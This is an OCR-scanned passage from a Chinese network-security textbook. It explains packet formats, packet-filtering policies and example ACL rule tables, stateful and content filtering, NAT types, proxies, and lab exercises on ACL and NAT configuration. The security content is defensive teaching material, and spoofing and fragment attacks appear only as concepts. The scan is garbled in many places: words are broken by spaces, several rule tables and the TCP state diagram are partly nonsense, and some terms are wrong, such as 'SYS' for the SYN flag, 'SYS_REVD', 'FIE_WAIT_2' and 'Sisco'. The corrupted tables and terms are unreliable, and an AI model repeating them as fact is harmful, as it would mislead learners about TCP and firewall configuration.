(1) 在 一 个 共用 系统 中 ,应当 根 据 管理 权限 将 系统 的 访问 权限 分 成 不 同等 级 。 请 分 析 
当 每 个 人 具有 自己 的 非 私密 性 文件 时 ,为 保证 系统 的 安全 , 比 他 的 权限 高 和 权限 低 的 人 分 别 


应 当 在 读 . 写 和 执行 3 种 访问 权限 方面 有 何 限制 ? 
(2) 其 他 发 现 或 想到 的 问题 。 


3.2 ”网络 的 逻辑 隔离 


这 一 节 介绍 目前 广泛 使 用 的 3 项 基本 网 络 逻 辑 隔离 技术 : 
(1) 数据 包 过 滤 技 术 ; 

(2) 网 络 地 址 转换 技术 ; 

(3) 代理 技术 。 


3.2.1 数据 包 过 滤 


现代 计算 机 网 络 都 是 基于 分 组 交换 的 网 络 , 所 有 的 数据 都 是 以 分 组 一 一 数据 包 的 形式 
传输 。 内 部 用 户 对 外 部 的 访问 以 及 外 部 用 户 对 内 部 的 访问 都 是 以 数据 包 的 形式 进行 。 因 
此 ,控制 数据 包 的 传输 一 一 限制 具有 某 些 特征 的 数据 包 的 传输 ,就 可 以 实现 网 络 访问 控制 。 
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1. 数据 包 及 其 结构 


包 过 滤 是 根据 数据 包 的 特征 进行 的 。 由 于 不 同 的 协议 所 规定 的 包头 格式 不 同 , 因 此 在 
制定 过 滤 规 则 前 ,应 当 充分 了 解数 据 包 的 格式 。 图 3. 13 是 几 种 常用 的 数据 包 的 格式 。 


0 1 34 .1:78 1516 1 1819 7: 2324 31 
版 本 T 关 标 长 服务 类 型 总 长 
标识 标志 | 厂 偏 移 
生存 时 间 协议 报头 校 验 和 
源 忆 地 址 
目的 外 地 址 
正 分 组 选项 项 充 
数 据 
(a) IP 分 组 格式 
0 en 加 15 
类 型 码 | 代码 校 验 和 
首部 其 余部 分 
数据 部 分 
(b) UDP 数据 报 格式 (c) ICMP 分 组 的 格式 


图 3.13 一 些 数据 包 的 格式 


下 面 介 绍 这 些 数据 包 中 可 以 体现 数据 包 特征 的 有 关 字 段 。 

(1) 源 地 址 Csource address) 和 目的 地 址 (destination address) : 根据 这 两 个 地 址 ,除了 
可 以 判断 数据 包 的 来 源 和 去 向 外 ,还 可 以 判断 出 数据 流 的 方向 是 流入 还 是 流出 。 

(2) 标识 符 : 是 发 送 方 分 配 的 一 个 独一无二 的 编号 ,用 于 标识 同一 数据 包 中 的 各 分 组 ， 
以 便 组 装 。 

(3) 标志 F(Flag): F 共 占 3 位 ,第 1 位 恒 为 0; 第 2 位 为 0 时 是 可 分 片 ,为 1 时 是 不 可 
分 片 ; 第 3 位 为 0 时 是 最 后 报 片 ,为 1 时 是 非 最 后 报 片 。 

(4) 片 偏 移 量 FO(fragment offset) : FO 占 13 位 ,用 以 标明 当前 段 片 在 初始 IP 分 组 中 
的 位 置 ,目的 主机 可 以 根据 FO 来 重新 组 合 IP 分 组 。 

(5) 源 端口 (source port) 和 目的 端口 (destination port) : 在 TCP 和 UDP 数据 包 中 , 源 
端口 和 目的 端口 分 别 表示 本 地 通信 端口 和 异地 通信 端口 。 端 口号 是 按照 协议 类 型 分 配 的 ， 
所 以 端口 号 也 表明 了 所 传输 的 数据 包 服 务 的 协议 类 型 。 

(6) 协议 Prot(protocol): 在 IP 数 据 包 中 ,“ 协 议 字 段 " 用 以 标识 接收 的 IP 分 组 中 的 数 
据 的 高 层 ( 传 输 层 ) 协 议 。 高 层 协议 号 由 TCP/IP 协议 中 央 权 威 机 构 NICCnetwork informa- 
tion center) 分 配 ,例如 : 1 一 一 控制 报 文 协议 ICMP ,6 一 一 传输 控制 协议 TCP ,8 一 一 外 部 网 
关 协 议 EGP,17 一 一 用 户 数据 包 协议 UDP,29 一 一 传输 层 协议 第 4 类 ISO-TP4。 

(7) 服务 类 型 ToS(type of service) : 在 IP 数据 包 中 ,ToS 描述 IP 分 组 所 希望 获得 的 
服务 质量 , 占 8 位 ,包括 : 

。 低 延 迟 .高 吞吐 量 ,高 可 靠 性 ,各 占 1 位; 
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。 优先 级 , 共 8 级 , 占 3 位 ; 


。 未 用 2 位 。 
表 3. 3 列 出 了 RFC 1349[Almquist 1992] 对 于 不 同 应 用 建议 的 ToS 值 。 
表 3.3 RFC 1349[Almquist 1992] 对 于 不 同 应 用 建议 的 ToS 值 
应 用 程序 最 小 时 延 最 大 吞吐 量 最 高 可 靠 性 最 小 费用 十 六 进 制 值 
Telnet/Rlogin 和 0 0 0 0xl10 
FTP 
控制 1 0 0 0 Ox10 
数据 0 1 0 0 Ox08 
任意 块 数据 0 1 0 0 0x08 
TFTP 和 0 0 0 Ox10 
SMTP 
命令 时 0 0 0 0x10 
数据 0 0 0 0x08 
DNS 
UDP 查询 1 0 0 0 Ox10 
TCP 查询 0 0 0 0 Ox00 
区 域 传输 0 1 0 0 0x08 
ICMP 
差错 0 0 0 0 0x00 
查询 0 0 0 0 0x00 
任何 IGP 0 0 1 0 Ox04 
SNMP 0 0 1 0 Ox04 
BOOTP 0 0 0 0 0x00 
NNTP 0 0 0 和 Ox02 


(8) 数据 包 内 容 : 前 面 的 7 个 字段 都 来 自 数据 包头 中 ,而 数据 内 容 则 是 来 自 数据 包 体 


中 。 如 数据 内 容 中 一 些 关键 词 可 以 代表 数据 内 容 的 某 一 方面 的 特征 。 对 数据 包 内 容 的 抽 
取 , 将 会 形成 依据 内 容 的 包 过 滤 规 则 。 这 是 目前 包 过 滤 技 术 研究 的 一 个 重要 方面 。 


2. 数据 包 过 滤 规 则 与 策略 


最 早 的 包 过 滤 是 在 路 由 器 上 进行 的 。 通 过 对 路 由 表 的 配置 ,来 决定 数据 包 是 否 符合 过 
滤 规 则 。 数 据 包 的 过 滤 规 则 由 一 些 规则 逻辑 描述 : 一 条 过 滤 规 则 规定 了 允许 数据 包 流 进 或 


流出 内 部 网 络 的 一 个 条 件 。 


在 制定 了 数据 包 过 滤 规 则 后 ,对 于 每 一 个 数据 包 ,路 由 器 会 从 第 一 条 规则 开始 诸 条 进行 


检查 ,最 后 决定 该 数据 包 是 否 符合 过 滤 逻 辑 。 
数据 包 规 则 的 应 用 有 两 种 策略 : 


(1) 默认 接受 : 


允许 通过 的 。 这 也 称 为 “ 黑 名 单 "策略 。 


(2) 默认 拒绝 : 一 切 未 被 允许 的 就 是 禁止 的 。 即 除 明确 指定 通过 的 数据 包 , 其 他 都 是 


一 切 未 被 禁止 的 就 是 允许 的 。 即 除 明 确 指定 禁止 的 数据 包 , 其 他 都 是 
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被 禁止 的 。 这 也 称 为 “ 白 名 单 " 策 略 。 

从 安全 的 角度 看 ,默认 拒绝 应 该 更 可 靠 。 

此 外 , 包 过 滤 还 有 禁 和 信和 禁 出 的 区 别 。 前 者 不 允许 指定 的 数据 包 由 外 部 网 络 流入 内 部 
网 络 , 后 者 不 允许 指定 的 数据 包 由 内 部 网 络 流 入 外 部 网 络 。 


3. 地 址 过 滤 技 术 


按照 地 址 进行 过 滤 是 最 基本 的 过 滤 技 术 , 它 的 过 滤 规 则 只 对 数据 包 的 源 地 址 .目标 地 址 
和 地 址 偏 移 量 进行 判断 。 这 在 路 由 器 上 是 非常 容易 配置 的 。 对 于 信誉 不 好 或 内 容 不 宜 并 且 
地 址 确定 的 主机 ,用 这 种 策略 通过 简单 配置 就 可 以 将 之 拒 之 门 外 。 但 是 ,对 于 攻击 尤其 是 地 
址 欺骗 攻击 的 防御 ,过 滤 规 则 的 配置 就 要 复杂 多 了 。 下 面 分 几 种 情形 分 别 考虑 。 

(1) IP 源 地 址 欺骗 攻击 : 对 于 攻击 者 伪装 内 部 用 户 的 IP 地 址 攻击 ,可 以 按照 下 面 的 原 
则 配置 过 滤 规 则 : 如 果 发 现 具有 内 部 地 址 的 数据 包 到 达 路 由 器 的 外 部 接口 ,就 将 其 丢弃 。 
显然 ,这 种 规则 对 于 外 部 主机 冒充 另外 一 台 主 机 的 攻击 则 无 能 为 力 。 

(2) 源 路 由 攻击 : 攻击 者 有 时 为 了 躲 过 网 络 的 安全 设施 ,要 为 数据 包 指 定 一 个 路 由 ,这 
条 路 由 可 以 使 数据 包 以 不 期 望 路 径 到 达 目 标 。 对 付 这 种 攻击 的 过 滤 规 则 是 丢弃 所 有 含有 源 
路 由 的 数据 包 。 

(3) 小 分 段 攻击 : 当 一 个 IP 包 太 长 时 ,就 要 对 其 进行 分 片 传输 。 分 组 后 ,传输 层 的 首部 
只 出 现在 IP 层 的 第 1 片 中 。 攻 击 者 利用 IP 分 片 的 这 一 特点 ,往往 会 建立 极 小 的 分 片 ,希望 
过 滤 路 由 器 只 检查 第 1 片 , 而 忽略 后 面 的 分 组 。 对 付 小 分 段 攻击 的 策略 是 丢弃 FO 为 1 的 
TCP、UDP 数据 包 。 

例 3.4 某 公 司 有 一 B 类 网 (123.45)。 该 网 的 子 网 (123. 45. 6. 0/24) 有 一 合作 网 络 
(135.79)。 管 理 员 希望 : 

。 禁止 一 切 来 自 Internet 的 对 公司 内 网 的 访问 ; 

。 人 允许 来 自 合作 网 络 的 所 有 子 网 (135. 79. 0.0/16) 访 问 公司 的 子 网 (123. 45. 6. 0/24); 

。 禁止 对 合作 网 络 的 子 网 (135. 79. 99. 0/24) 的 访问 权 ( 对 全 网 开放 的 特定 子 网 除外 ) 。 

按照 管理 员 的 要 求 ,可 以 得 到 表 3.4 中 的 过 滤 规 则 。 为 简单 起 见 , 只 考虑 从 合作 网 络 流 
向 公司 的 数据 包 , 对 称 地 处 理 逆 向 数据 包 只 需 互 换 规则 行 中 源 地 址 和 目标 地 址 即 可 。 

表 3.4 某 公司 网 络 的 包 过 滤 规 则 


规则 源 地 址 目的 地 址 过 滤 操 作 
A 135. 79. 0.0/16 123. 45. 6. 0/24 允许 
B 135. 79. 99. 0/24 123. 45. 0.0/16 拒绝 
0.0. 0.0/0 0.0.0.0/0 拒绝 


表 3.4 中 规则 C 是 默认 规则 。 仔 细 分 析 可 以 发 现 , 表 3.4 中 用 来 禁止 合作 网 的 特定 子 
网 的 访问 规则 B 是 不 必要 的 。 它 正 是 在 BAC 规则 集中 造成 数据 包 2 被 拒绝 的 原因 。 如 果 
删除 规则 B, 得 到 表 3. 5 所 示 的 行为 操作 。 
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表 3.5 删除 规则 B 后 的 行为 操作 


数据 包 源 地 址 目的 地 址 目标 行为 操作 AC 行为 操作 
ji 135. 79. 99.1 | 拒绝 拒绝 CC) 
2 135. 79. 99.1 123. 45. 6.1 允许 允许 (A) 
这 135.79.1.1 123. 45. 6.1 允许 允许 (A) 
4 135.79, 下 于 也 次 4 二 和 拒绝 拒绝 (C) 


4. 服务 过 滤 技 术 


按 服务 进行 过 滤 ,就 是 根据 TCP/UDP 的 端口 号 制定 过 滤 规 则 。 但 是 ,由 于 源 端口 是 
可 以 伪装 的 ,所 以 基于 源 端 口 的 过 滤 是 有 风险 的 。 下 面 进 行 一 些 分 析 。 

(1) 关于 外 部 服务 的 端口 号 

如 果 过 滤 规 则 完全 依赖 于 外 部 主机 的 端口 号 ,例如 允许 内 部 主机 向 外 部 服务 器 的 邮件 
发 送 服务 ,而 且 TCP 的 端口 25 就 是 常规 邮件 (STMP) 端 口 时 ,这 样 的 配置 是 安全 的 。 但 
是 , 包 过 滤 路 由 器 是 无 法 控制 外 部 主机 上 的 服务 确实 是 在 常规 的 端口 上 ,攻击 者 往往 会 通过 
伪造 ,利用 端口 25 向 内 部 主机 发 送 其 他 应 用 程序 (非常 规 邮件 ) 的 数据 包 ,建立 连接 ,进行 非 
授权 访问 。 这 时 ,只 能 禁止 25 端口 对 于 内 部 主机 的 访问 。 因 为 内 部 主机 对 这 个 外 部 端口 不 
能 信任 。 

(2) 关于 内 部 主机 的 源 端 口号 

从 内 部 到 外 部 的 TCP/UDP 连接 中 ,内 部 主机 的 源 端口 一 般 采 用 大 于 1024 的 随机 端 
口 。 为 此 ,对 端口 号 大 于 1024 的 所 有 返回 到 内 部 的 数据 包 都 要 允许 ,不 过 还 应 辨认 端口 号 
大 于 1024 的 数据 包 中 哪些 是 伪造 的 。 

对 于 TCP 数据 包 来 说 ,可 以 通过 flag 位 辨认 哪些 是 来 自 外 部 的 连接 请 求 。 但 是 UDP 
是 无 连接 的 ,没有 这 样 的 flag 位 可 使 用 ,只 能 唯一 地 辨认 端口 号 。 所 以 允许 UDP 协议 对 外 
访问 会 带 来 风险 ,因为 返回 的 数据 包 上 的 端口 号 有 可 能 是 攻击 者 伪造 的 。 当 请 求 端口 和 目 
的 端口 都 是 固定 的 时 ,这 个 问题 才能 解决 。 

例 3.5 表 3.6 与 表 3.7 就 是 否 考 虑 数据 包 的 源 端 口 进 行 对 照 。 规 则 表 3.6 由 于 未 
考虑 数据 包 的 源 端 口 ,出现 了 两 端 所 有 端口 号 大 于 1024 的 端口 上 的 非 预 期 的 作用 。 而 规 
则 表 3.7 考虑 数据 包 的 源 端口 ,所 有 规则 限定 在 25 号 端口 上 , 故 不 可 能 出 现 两 端 端 口号 均 
在 1024 以 上 的 端口 上 连接 的 交互 。 

表 3.6 未 考虑 源 端 口 时 的 包 过 滤 规 则 


规则 方向 类 型 源 地 址 目的 地 址 目的 端口 行为 操作 
A 入 TCP 外 内 25 允许 
B 出 TEP 内 外 >>=1024 允许 
区 出 TCF 内 外 25 允许 
D 入 TCR 外 内 二 一 1024 允许 
E 出 /入 任何 任何 任何 任何 禁止 
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表 3.7 考虑 了 源 端口 时 的 包 过 滤 规则 


规则 | 方向 | 类 型 源 地 址 目的 地 址 源 端口 目的 端口 行为 操作 
A 人 TCP 外 内 >=1024 25 人 允许 
B 出 TCP 内 外 25 >=1024 人 允许 
© 出 TCP 内 外 >=1024 25 允许 
D 入 TCP 外 内 25 >=1024 人 允许 
E 出 /人 | 任何 任何 任何 任何 任何 禁止 


5. 状态 检测 过 滤 技 术 


使 用 C/S 模式 的 数据 通信 和 具有 连接 状态 。 最 典型 的 是 TCP 连接 。 如 图 3. 14 所 示 ， 
TCP 连接 具有 11 个 状态 : CLOSED LISTEN SYS_SENT、SYS_REVD、EFIN_WAIT _1、 
FIE_WAIT_2、.ESTAB.CLOSE_WAIT.LAST_ACK.CLOSING TIME_WAIT。 


开始 关闭 
被 动 打开 | - 关闭 /超时 /复位 
(listen) | 1 关闭 7 、 而 TCB | 
建 TCB 1- 丽 TcB 发 送 SYN 连接 
一 一 一 去 一 一 一 = TCB 
收 SYN 侦 听 SEND ~、 加 
发 SYN,ACK 被 动 打开 发 SYN 
SN _ 收 SYN/ 发 ACK 
已 收 同时 打开 
关闭 | 收 ACK ofSYN in 收 SYN,ACK We oi 
发 送 FIN A 到 人 内 ”发 ACK 收 Ee 


注 : 一 一 客户 进程 正常 状态 转换 
一 一 一 服务 器 进程 正常 状态 转换 
一 一 一 非 正 常 状态 转换 

上 段 : 转换 条 件 

下 段 : 转换 操作 


Timeout=2MSL: 本 地 TCP 等待 超时 2MSL(2 倍 的 最 大 段 生存 期 )。 
图 3.14 TCP 协议 状态 转换 图 


由 图 3. 14 的 描述 可 以 看 出 TCP 连接 状态 具有 如 下 特征 : 
。 TCP 连接 是 有 状态 的 ,连接 进入 不 同 的 阶段 具有 不 同 的 状态 ; 
。 TCP 连接 状态 的 转换 要 按 一 定 的 顺序 进行 ,不 可 随意 改变 ; 
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。 在 TCP 连接 中 客户 机 与 服务 器 的 状态 不 相同 ,如 客户 机 不 能 进入 LISTEN 状态 , 服 
务 器 不 可 能 进入 SYN_SEND 状态 ; 

。TCP 包 中 有 6 个 标志 位 : FIN、SYS、RST、PSH、ACK、URG, 其 中 一 些 不 能 同时 存 
在 ,如 SYS 不 能 和 FIN RST、PSH 同时 存在 。 

这 些 特 征 就 是 设置 状态 检测 包 过 滤 规 则 的 基础 。 状 态 信 息 可 以 从 数据 包 中 的 源 地 址 、 
目的 地 址 ,协议 类 型 .连接 状态 .超时 时 间 以 及 其 他 信息 (如 TCP/UDP 协议 的 端口 号 IC- 
MP 的 ID 号 等 ) 中 获得 。 

在 检测 中 ,一 旦 发 现 数据 包 的 状态 不 符 ,就 可 以 认为 是 状态 异常 包 而 加 以 拒绝 。 


6. 内 容 过 滤 技 术 


内 容 安全 是 包 过 滤 技 术 中 正在 兴起 的 一 个 重要 的 分 支 ,也 是 目前 最 活跃 的 安全 领域 。 
它 是 基于 内 容 安全 的 一 项 技术 。 
内 容 安全 涵盖 如 下 3 个 方面 。 
(1) 违禁 内 容 的 传播 : 违禁 内 容 是 指 内 容 本 身 要 表达 的 意思 ,违反 了 某 种 规则 或 安全 
策略 ,尤其 是 政策 法 规 允 许 的 范畴 。 例 如 ,传播 关于 SRARS 的 衣 言 .发 布 关 于 怒 怖 袭击 的 
谣言 .制造 或 传播 淫秽 色情 等 ,都 是 违法 的 。 
禁止 违禁 内 容 的 传播 的 技术 措施 有 下 列 两 种 : 
。 对 违禁 内 容 进行 内 容 过 滤 , 如 基于 关键 词 的 内 容 过 滤 ,基于 语意 的 内 容 过 滤 。 前 者 
在 技术 上 很 成 熟 ,准确 度 很 高 , 漏 报 率 低 ,但 误 报 率 高 。 

。 对 违禁 内 容 的 来 源 进 行 访 问 控制 ,这 种 方式 对 已 经 知道 恶意 传播 的 对 象 非常 有 效 。 
到 目前 为 止 ,还 没有 禁止 违禁 内 容 传播 的 理想 的 理论 方法 ,在 必须 执行 违禁 内 容 控 
制 的 情况 下 ,多 数 采用 人 工 和 技术 相 结合 的 策略 。 

(2) 基于 内 容 的 破坏 : 内 容 破 坏 的 典型 是 带 有 病毒 的 文件 ,是 被 算 改 了 的 正常 文件 上 
带 有 病毒 特征 代码 。 这 些 代码 在 被 执行 的 时 候 , 具 有 有 害 的 特性 。 

防 病毒 是 目前 采用 最 多 的 防止 基于 内 容 破 坏 的 解决 方案 。 通 过 查找 内 容 中 的 恶意 病毒 
代码 来 消除 基于 内 容 的 破坏 。 

(3) 基于 内 容 的 攻击 : 基于 内 容 的 攻击 ,以 内 容 为 载体 ,以 应 用 程序 为 攻击 对 象 ,目标 
是 取得 对 应 用 主机 的 控制 权 。 例 如 ,在 Web 上 表格 填写 数据 时 ,填写 恶意 格式 ,导致 CGI 
程序 执行 错误 ,引发 应 用 程序 出 错 。 

基于 内 容 的 攻击 已 经 超过 违禁 内 容 传 播 和 病毒 ,目前 存在 的 十 大 漏洞 和 风险 包括 : 参 
数 无 效 . 访 问 控制 失效 、 账 户 和 会 话 管理 失效 、 跨 站 点 脚本 、 缓 冲 溢出 、 恶 意 命令 .错误 处 理 问 
题 不 安全 加 密 、 远 程 管理 缺陷 、 配 置 错 误 。 


实验 8 ACL 配置 


1. 实验 目的 


(1) 掌握 设计 包 过 滤 策 略 的 设计 方法 。 
(2) 掌握 在 路 由 器 /防火 墙 上 进行 ACL 配置 的 方法 。 
e lll 


2. 实验 内 容 


(1) 为 一 个 组 织 设 计 包 过 滤 策 略 。 
(2) 按照 设计 的 包 过 滤 策 略 进行 ACL 配置 。 
(3) 对 配置 后 的 路 由 器 /防火 墙 进行 ACL 配置 测试 。 


3. 建议 环境 


(1) 在 一 种 防火 墙 软件 (如 瑞星 ) 中 进行 标准 ACL 和 扩展 ACL 配置 。 
(2) 在 一 种 路 由 器 产品 (如 Sisco IOS) 中 进行 标准 ACL .扩展 ACL .静态 ACL .动态 
ACL 和 反 向 ACL 配置 。 


4. 实验 准备 


(1) 选择 一 个 组 织 ,其 各 部 门 在 对 Internet 的 通信 方面 有 不 同 的 允许 和 限制 。 例 如 : 

。 有 的 部 门 允许 Web 数据 流 ,而 禁止 FTP 或 Telnet 数据 流 。 

。 限定 某 台 主机 可 以 通过 特定 服务 (如 FTP) 访 问 特定 网 络 。 

。 只 有 某 子 网 的 数据 流 可 以 被 转发 出 去 。 

。 在 某 接 口上 阻止 来 自 特 定 地 址 的 数据 流 ,而 转发 其 他 数据 。 

希望 选择 的 组 织 起 码 要 具有 如 上 其 中 3 种 类 型 的 允许 或 限制 。 

(2) 从 包 过 滤 角 度 画 出 该 组 织 网 络 的 拓扑 结构 。 

(3) 为 该 组 织 设计 包 过 滤 策 略 。 

(4) 为 该 组 织 选择 防火 墙 或 路 由 器 ,查阅 其 用 户 手册 ,了 解 其 可 以 进行 ACL 配置 的 模 
式 和 可 以 使 用 的 命令 。 

(5) 分 任务 写 出 进行 ACL 配置 的 步骤 (命令 清单 ) 。 

(6) 设计 对 配置 好 的 防火 墙 进行 测试 的 环境 和 步 又。 


5. 推荐 的 分 析 讨论 内 容 


(1) 设计 防火 墙 的 ACL 有 哪些 策略 ? 
(2) 其 他 发 现 或 想到 的 问题 。 


3.2.2 网 络 地 址 转换 


网 络 地 址 转换 (network address translation, NAT) 就 是 使 用 两 套 IP 地 址 一 一 内 部 IP 
地 址 (也 称 私有 IP 地址) 和 外 部 IP 地 址 (也 称 公共 IP 地 址 )。 当 受 保护 的 内 部 网 连接 到 In- 
ternet 并 且 有 用 户 要 访问 Internet 时 , 它 首先 使 用 自己 网 络 的 内 部 IP 地 址 ,到 了 NAT 后 ， 
NAT 就 会 从 公共 IP 地 址 集中 选 一 个 未 分 配 的 地 址 分 配给 该 用 户 ,该 用 户 即 可 使 用 这 个 合 
法 的 IP 地 址 进行 通信 。 同 时 ,对 于 内 部 的 某 些 服务 器 如 Web 服务 器 ,网 络 地 址 转换 器 允许 
为 其 分 配 一 个 固定 的 合法 地 址 。 外 部 网 络 的 用 户 就 可 通过 NAT 来 访问 内 部 的 服务 器 。 这 
种 技术 既 缓 解 了 少量 的 IP 地 址 和 大 量 的 主机 之 间 的 矛盾 一 一 被 保护 网 络 中 的 主机 不 必 拥 
有 固定 的 IP 地 址 ,又 对 外 隐藏 了 内 部 主机 的 IP 地 址 ,提高 了 安全 性 。 
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1. NAT 的 工作 过 程 


NAT 的 工作 过 程 如 图 3. 15 所 示 。 


目的 耳 包 源 耳 包 
目的 地 址 | 源 地 址 Re 目的 地 址 源 地 址 
234.56.7.8 |abc.com.cn 123.456.111.3| abc.com.cn 被 保护 
| 内 部 网 
| 日 的 地 址 | 源 地 址 . 几 目的 地 址 | ” 源 地 址 
abc.com.cn | 234.56.7.8 = abc.com.cn |123.456.111.3 


图 3.15 NAT 的 工作 过 程 


在 内 部 网 络 通过 安全 网 卡 访 问 外 部 网 络 时 ,将 产生 一 个 映射 记录 。 系 统 将 外 出 的 源 地 
址 和 源 端 口 映 射 为 一 个 伪装 的 地 址 和 端口 ,让 这 个 伪装 的 地 址 和 端口 通过 非 安全 网 卡 与 外 
部 网 络 连接 ,这 样 对 外 就 隐藏 了 真实 的 内 部 网 络 地 址 。 在 外 部 网 络 通过 非 安全 网 卡 访问 内 
部 网 络 时 , 它 并 不 知道 内 部 网 络 的 连接 情况 ,而 只 是 通过 一 个 开放 的 IP 地 址 和 端口 来 请 求 
访问 。NAT 据 预先 定义 好 的 映射 规则 来 判断 这 个 访问 是 否 安全 : 当 符合 规则 时 ,防火 墙 认 
为 访问 是 安全 的 ,可 以 接受 访问 请 求 ,也 可 以 将 连接 请 求 映射 到 不 同 的 内 部 计算 机 中 ; 当 不 
符合 规则 时 ,被 认为 该 访问 是 不 安全 的 ,不 能 被 接受 ,外 部 的 连接 请 求 即 被 屏 项 。 网 络 地 址 
转换 的 过 程 对 于 用 户 来 说 是 透明 的 ,不 需要 用 户 进行 设置 ,用 户 只 要 进行 常规 操作 即 可 。 


2. NAT 的 类 型 


NAT 有 3 种 类 型 : 静态 NAT、 动 态 地 址 NAT 和 网 络 地 址 端口 转换 。 

(1) 静态 NAT, 就 是 将 内 部 网 络 中 的 每 个 主机 都 永久 地 与 外 部 网 络 中 的 某 个 合法 地 址 
绑 定 。 这 是 最 为 简单 的 NAT 设置 。 

(2) 动态 地 址 NAT, 即 每 个 内 部 主机 所 使 用 的 IP 地 址 是 不 固定 的 。 当 一 个 内 部 主机 
与 远程 用 户 连接 之 后 ,动态 地 址 NAT 就 会 给 其 分 配 一 个 临时 的 IP 地 址 。 用 户 断 开 后 ,就 
要 释放 这 个 IP 地 址 ,留待 以 后 使 用 。 这 种 方式 主要 应 用 在 拨号 连接 或 频繁 的 远程 连接 中 。 

(3) 网 络 地 址 端口 转换 (network address port translation, NAPT), 是 将 内 部 连接 映射 
到 外 部 网 络 的 一 个 单独 的 IP 地 址 上 ,同时 在 该 地 址 上 加 上 一 个 由 NAT 设备 选 定 的 TCP 
端口 号 ,从 而 可 以 做 到 多 个 内 部 IP 地 址 共用 一 个 外 部 IP 地 址 。 这 种 方式 适合 小 型 办 公 系 
统 , 可 以 节省 上 网 费用 且 比 较 容 易 管 理 , 但 会 导致 一 定 程度 的 拥塞 。 


3. 使 用 NAT 的 优 缺 点 


NAT 使 内 部 网 络 的 计算 机 不 可 能 直接 访问 外 部 网 络 : 通过 包 过 滤 分 析 , 当 所 有 传人 的 

包 如 果 没 有 专门 指定 配置 到 NAT, 就 将 之 丢弃 。 同 时 使 所 有 内 部 的 IP 地 址 对 外 部 是 隐蔽 

的 。 因 此 ,网 络 之 外 没有 谁 可 以 通过 指定 IP 地 址 的 方式 直接 对 网 络 内 的 任何 一 台 特 定 的 计 

算 机 发 起 攻击 。NAT 还 可 以 使 多 个 内 部 主机 共享 数量 有 限 的 了 P 地址。 还 可 以 启用 基本 的 

包 过 滤 安 全 机 制 ,NAT 虽然 可 以 保障 内 部 网 络 的 安全 ,但 也 有 一 些 局 限 。 例 如 ,内 部 用 户 
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可 以 利用 某 些 木马 程序 通过 NAT 作 外 部 连接 。 
实验 9 NAT 配置 


1. 实验 目的 


(1) 了 解 NAT 的 功能 。 
(2) 掌握 进行 NAT 配置 和 测试 的 方法 。 


2. 实验 内 容 


(1) 针对 一 个 组 织 进行 NAT 配置 。 
(2) 对 配置 后 的 NAT 进行 测试 。 


3. 建议 环境 


(1) 在 一 种 路 由 器 产品 (如 Sisco IOS 或 华为 路 由 器 ) 中 进行 NAT 配置 。 
(2) 在 网 络 操作 系统 (如 Windows 2000) 中 进行 NAT 配置 。 


4. 实验 准备 


(1) 阅读 有 关 NAT 配置 的 资料 ,了 解 进 行 不 同 NAT 配置 方法 的 适用 环境 和 配置 步骤 。 
(2) 选择 一 个 合适 的 组 织 , 画 出 网 络 拓 扑 结 构 ,设计 为 其 进行 NAT 配置 的 环境 和 步骤 。 
(3) 设计 对 配置 好 的 NAT 进行 测试 的 步骤 。 


5. 范例 


范例 1 某 企 业 有 Cisco 路 由 器 2 台 , 带 超级 终端 的 PC 3 台 ,Cisco 集线器 2 台 。 

要 求 : 为 其 设计 一 个 NAT 接 入 方案 ,并 实际 进行 配置 ,使 内 部 网 络 达 到 如 下 目标 : 

。 内 部 3 台 PC 可 以 共享 一 个 IP 地 址 ; 

。 内 部 可 以 在 Internet 上 发 布 消息 。 

范例 2 某 企业 从 ISP 获得 6 个 有 效 IP 地 址 : 202. 103. 100. 128 一 202. 103. 100. 135， 
掩 码 为 255.255. 255. 248(128 和 135 为 网 络 地 址 和 广播 地 址 ,不 可 用 ) ,通过 一 台 2611 路 由 
器 接 人 Internet。 内 部 网 络 根 据 职能 分 成 若干 子 网 ,并 期 望 服务 器 子 网 对 外 提供 Web 服 
务 , 财 务 部 门 使 用 独立 的 地 址 池 接 入 Internet', 其 他 部 门 共享 剩余 的 地 址 池 。 地 址 具体 分 配 
如 表 3. 8 所 示 。 


表 3.8 一 个 企业 的 IP 地址 空间 


分 配对 象 地 址 空间 地 址 转换 类 型 分 配 的 IP 地 址 地 址 数量 
接 人 路 由 器 S 口 | 202. 103. 100. 129/29 = 202. 103. 100. 129/29 
Web 服务 器 192. 168. 10. 2/24 静态 202. 103. 100. 130/29 1 
财务 部 门 192. 168. 20. 0/24 端口 复 用 202. 103. 100. 131/29 和 
其 他 部 门 192. 168. 30. 0/24 动态 202. 103. 100. 132 一 134/29 3 
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要 求 : 为 该 企业 设计 一 个 进行 NAT 接 入 的 方案 ,并 实际 进行 配置 。 
6. 推荐 的 分 析 讨 论 内 容 


(1) 比较 NAT 与 代理 服务 器 在 防火 墙 中 的 作用 有 哪些 不 同 与 联系 。 
(2) 其 他 发 现 或 想到 的 问题 。 


3.2.3 代理 技术 


应 用 于 网 络 安全 的 代理 (proxy) 技 术 来 自 代 理 服 务 器 (proxy server) 技 术 。 在 客户 / 服 
务 器 工作 模式 中 ,代理 服务 器 位 于 客户 与 Internet 上 的 服务 器 之 间 。 请 求 由 客户 端 向 服务 
器 发 起 ,但 是 这 个 请 求 要 首先 被 送 到 代理 服务 器 。 代 理 服务 器 分 析 请 求 ,确定 其 是 合法 的 以 
后 ,首先 查看 自己 的 缓存 中 有 无 要 请 求 的 数据 , 若 有 就 直接 传送 给 客户 端 ,否则 再 以 代理 服 
务 器 作为 客户 端 向 远程 的 服务 器 发 出 请 求 。 远 程 服 务 器 的 响应 也 要 由 代理 服务 器 转交 给 客 
户 端 ,同时 代理 服务 器 还 将 响应 数据 在 自己 的 缓存 中 保留 一 份 备份 ,以 被 客户 端 下 次 请 求 时 
使 用 。 

应 用 于 网 络 安全 的 代理 技术 也 要 建立 一 个 数据 包 的 中 转机 制 ,并 在 数据 的 中 转 过 程 中 
加 入 一 些 安全 机 制 。 

代理 技术 可 以 在 不 同 的 网 络 层 次 上 进行 。 主 要 的 实现 层次 在 应 用 层 和 传输 层 ,分 别称 
为 应 用 级 代理 和 电路 级 代理 ,它们 的 工作 原理 有 所 不 同 。 


1. 应 用 级 代理 


应 用 级 代理 的 工作 原理 如 图 3. 16 所 示 。 应 用 级 代理 是 针对 特定 的 应 用 的 ,只 有 为 特定 
的 应 用 程序 安装 了 代理 程序 代码 ,该 服务 才 会 被 支持 ,并 建立 相应 的 连接 。 因 此 ,这 种 方式 
可 以 拒绝 任何 没有 明确 配置 的 连接 ,从 而 提供 了 额外 的 安全 性 和 控制 性 。 但 是 ,应 用 级 代理 
